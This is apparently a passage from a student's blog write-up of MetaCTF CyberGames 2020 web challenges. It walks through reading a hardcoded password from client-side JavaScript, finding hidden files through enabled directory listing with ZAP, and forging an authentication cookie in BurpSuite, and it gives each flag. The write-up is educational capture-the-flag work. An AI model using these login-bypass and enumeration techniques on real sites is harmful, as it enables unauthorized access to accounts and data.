Uh oh, I woke up to hear that some Swifties seem to have sabotaged my Katy Perry fan page! After writing about why KP is clearly the better artist, I believe they hacked into the system and somehow changed my password! I need to publish a big story today before TMZ steals my scoop, however I can’t find my way back into the admin panel. Can you please help me out by finding my password so I can get back to work?

Note: Obviously most sites aren’t built like this, but it’s good to get familiar examining a website’s source code looks, how resources get loaded in, etc :)

Click here to visit the site

By checking out the source code through the developer console, we can see a framework.js script loaded. This script contains the function authenticate():

function authenticate(){
var username = document.getElementById("inputUsername").value;
var password = document.getElementById("inputPassword").value;
var notFailed = true;
if(username!="ChrisM"){
alert("You did not enter the correct username!");
notFailed = false;
}
if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
alert("You did not enter the correct password!");
notFailed = false;
}
if(notFailed){
alert("Hiya!");
window.location.pathname = './a3263ca2855a26f06bd679ac3e240af9/adminpanel.html';
}
}

Client-side authentication is very unsafe because it allows an attacker to view and manipulate the login process. The flag is MetaCTF{So_You_Wanna_Play_With_Magic}.

Barry’s Web Application

150 points/solved by 781 teams

I’ve made this cool new web application that I plan to use to host a blog. Please check it out at

http://host1.metaproblems.com:5620/

Right now it’s still currently being built, but I hope you enjoy what’s there so far!

Browsing to the provided address gives us the webpage.

A screenshot of the “Barry’s web server” website
A screenshot of the “Barry’s web server” website
Barry’s website

To access the documents, we might try spidering the webpage to see what other directories are available. An easy way to do this is with ZAP’s spider.

A screenshot of the OWASP ZAP main page
A screenshot of the OWASP ZAP main page
ZAP is OWASP’s automated web vulnerability scanner.

By default, ZAP won’t try to spider above the lowest directory indicated in the URL field, so set it to http://host1.metaproblems.com:5620/dev/.

A screenshot of ZAP’s results for Barry’s website
A screenshot of ZAP’s results for Barry’s website
“Directory browsing is enabled.”

It isn’t even necessary to spider because directory browsing is enabled, and the documents directory already shows up in the results. Directory listing may reveal hidden scripts, include files, backup source files, and other files that can be accessed to read sensitive information, which is why this feature should always be disabled.

Browse to /docs to find the hidden files.

A screenshot of a webpage showign the flag
A screenshot of a webpage showign the flag
The hidden file in the ‘/docs’ directory

The flag is MetaCTF{Dont_l3t_y0ur_d1rect0ries_b3_l1st3d}.

Everyone Loves a Good Cookie

175 points/solved by 615 teams

Cookies are used by websites to keep track of user sessions and help with authentication. Can you spot the issue with this site and convince it that you’re authenticated?

The website asks for a secret code to log in.

A screenshot of the website prompting for a secret code
A screenshot of the website prompting for a secret code
We don’t have a secret code, oh no…

It sets a cm-authenticated cookie with the value 0 when an incorrect secret code is entered.

A screenshot of Chrome’s cookie manager
A screenshot of Chrome’s cookie manager
The cm-authenticated cookie set by the website

We can manipulate this cookie using BurpSuite. First, make sure that your browser is configured to use BurpSuite’s proxy. Then, on the Proxy tab, turn on Intercept and browse to the challenge site in your browser.

The raw request is seen in BurpSuite.

A screenshot of BurpSuite’s proxy tool
A screenshot of BurpSuite’s proxy tool
BurpSuite is a popular web application manipulation tool and proxy.

Right-click anywhere in the request and select “Send to Repeater.” This will allow us to manipulate the cookie value. The Repeater tab should light up. In the Params tab, double-click the value of the cookie to edit it. Set the value to 1. Also, remove the password field using the button on the right so that the cookie isn’t set back to 0 when the request is submitted.

A screenshot of BurpSuite’s repeater tool
A screenshot of BurpSuite’s repeater tool
The ‘cm-authenticated’ cookie is set to 1. Do we still need a password?

Now click the “Send” button.

A screenshot of BurpSuite’s repeater tool
A screenshot of BurpSuite’s repeater tool
The flag is visible in the response.

The raw response is displayed on the right. The flag is MetaCTF{oscar_says_i_love_trash_and_cookies}.

Bonus Flags

CyberGames 2020 Design Bonus

75 points

There was a bonus flag hidden in this year’s CyberGames logo.

The logo with various encodings in the image
The logo with various encodings in the image
The CyberGames 2020 logo
  • The octal on the bottom left decodes to welcome_to_the_.
  • The hex on the top left decodes to CyberGames_shall_we_.
  • The Morse code around the inner circle decodes to play_a_.
  • The binary on the right decodes to game?.

The bonus flag is MetaCTF{welcome_to_the_CyberGames_shall_we_play_a_game?}

In Conclusion

With 6,750 points, our score placed us in 36th overall and 24th among the student teams. This qualified us for swag bags and t-shirts (top 30 teams in each category) — my first time receiving a prize for a CTF!

It was cool to see how far my teammates and I have come in developing our skills and solving CTF challenges. I spent most of my time with the forensics challenges and solved all but two of them, which I definitely wouldn't have been able to do a few years ago. However, I also learned that I don’t have much packet capture analysis experience, which I plan to work on.

Finally, thank you to all the MetaCTF organizers for their time and effort put into this competition. I am looking forward to MetaCTF’s 2021 Cyber Games (maybe even in person again)!

Written by

DFIR, CTFs, disinformation, STEM education, and pretty much anything else that comes to mind. RIT Computing Security ’22. wyatttauber.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store